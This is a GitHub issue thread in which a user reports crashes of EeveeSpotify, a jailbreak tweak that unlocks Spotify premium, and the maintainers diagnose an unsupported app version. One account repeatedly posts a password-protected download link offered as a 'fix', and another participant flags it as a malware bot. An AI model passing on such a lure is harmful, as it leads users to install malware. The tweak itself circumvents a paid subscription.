### ISSUE TITLE
[Bug] App crashes on startup, iOS 15.8.1 iPhone 6s, Dopamine JB

### ISSUE THREAD

**Issue by jimmysofat6864** [whoeevee/EeveeSpotify#359]
### Is this issue appropriate?

- [X] I have read the document in its entirety

### Is this issue unique to EeveeSpotify?

- [X] I was unable to reproduce my issue using the stock Spotify app

### Have you searched the existing issues?

- [X] This is a unique issue

### Describe the bug.

The app crashes immediately upon launch. I tried to use the debug deb file but a rootless version is not available in the GitHub actions tab so I am using the standard rootless one. Refer to the debug log and the screen recording. 

[text-AC93C70BEF1B-1.txt](https://github.com/user-attachments/files/16823433/text-AC93C70BEF1B-1.txt)
[text-27F63A58E348-1.txt](https://github.com/user-attachments/files/16823434/text-27F63A58E348-1.txt)

https://github.com/user-attachments/assets/b11df870-2dbf-4547-ad6e-e5f21fe41c26

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by yodaluca23** [comment]
Do not follow the links posted by @KrissV2 they are a malware bot.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by nriavv** [comment]
Facing the same issue on iOS 14.3 iPhone 7 Plus, unc0ver JB.

**Comment by whoeevee** [comment]
I looked into your crash reports, and it seems you're using an unsupported version of Spotify

EeveeSpotify only supports the latest App Store version (8.9.68) and the latest available version for iOS 14 (8.9.8)

**Comment by jimmysofat6864** [comment]
I’m using iOS 15 and the latest available version provided in the App Store
and I am still have the same issue.

**Comment by whoeevee** [comment]
Are you sure? The latest version of Spotify on App Store requires iOS 15 and has bundle version 896800490 (8.9.68), while your crash report shows 886400560 (8.8.64)

**Comment by jimmysofat6864** [comment]
It’s interesting that you say that because I tested this by deleting the
Spotify app and reinstalling the app and then provided you the logs after
the fact so I’m not sure why it’s doing that. If it helps, I tried using
the trollstore method to install it and it works there just not by using
the tweak it crashes.

**Comment by asdfzxcvbn** [comment]
can you try disabling tweak injection into the app with choicy?

**Comment by jimmysofat6864** [comment]
If I do that then the tweak doesn’t work and it just results in no premium.

**Comment by yodaluca23** [comment]
@asdfzxcvbn Their jailbroken and using the tweak .deb I believe. Not TrollStore with .ipa

**Comment by asdfzxcvbn** [comment]
closing, since this seems to be an issue on their side

they can just use the ipa
